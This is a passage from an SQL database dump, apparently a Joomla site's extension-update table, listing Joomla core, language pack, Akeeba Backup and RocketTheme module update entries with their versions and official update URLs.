LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2470,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2471,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2473,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(2474,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2475,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2476,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2477,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2478,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2479,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2480,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2481,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2482,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2483,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2484,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2485,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2486,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2487,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2488,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2489,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2490,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2491,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2492,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2493,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2494,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2495,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2496,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2497,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2498,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2499,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2500,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2501,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2502,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2503,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2504,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2505,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2506,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2507,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2508,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2509,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2510,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2511,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2512,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2513,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2514,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2515,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2516,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2517,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2518,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2519,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2520,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2521,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2522,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2523,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2524,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2525,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2526,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2527,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2528,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2529,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2530,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2531,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2532,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2533,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2534,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2535,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2536,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2537,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2538,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2539,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2540,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2541,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2542,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2543,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2544,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2545,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2546,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2547,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2548,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2549,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2550,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2551,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2552,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2553,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2554,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2555,3,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2556,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2557,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2558,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2559,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2560,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2561,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2562,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2563,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2564,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2565,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2566,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2567,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2568,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2569,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2570,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2571,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2572,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2573,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2574,3,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2575,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2576,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2577,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2578,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2579,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2580,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2581,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2582,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2583,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2584,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2585,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2586,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2587,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2588,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2589,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2590,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2591,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2592,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2593,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2594,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2595,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2596,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2597,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(2598,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(2599,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(2600,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(2601,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(2602,57,0,'French','','pkg_fr-FR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(2603,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(2604,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(2605,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(2606,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(2607,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(2608,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(2609,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.9.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(2610,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(2611,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(2612,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(2613,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(2614,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(2615,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(2616,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(2617,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(2618,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(2619,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(2620,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(2621,57,0,'English US','','pkg_en-US','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(2622,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(2623,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(2624,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(2625,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(2626,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(2627,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(2628,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(2629,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(2630,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(2631,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(2632,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(2633,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(2634,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(2635,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(2636,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(2637,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(2638,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(2639,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(2640,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(2641,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(2642,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(2643,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2646,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.5','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3076',''),(2648,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2649,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2650,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2651,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2652,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2653,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2654,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2655,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2656,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2657,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2658,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2659,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2660,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2661,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2662,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2663,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2664,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2665,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2666,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2667,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2668,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2669,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2670,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2671,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2672,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2673,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2674,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2675,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2676,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2677,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2678,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2679,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2680,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2681,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2682,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2683,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(2684,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2685,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2686,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2687,1,0,'Joomla','','joomla','file','',0,'3.9.10','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2688,67,0,'Akeeba Backup Core package','Akeeba Backup Core 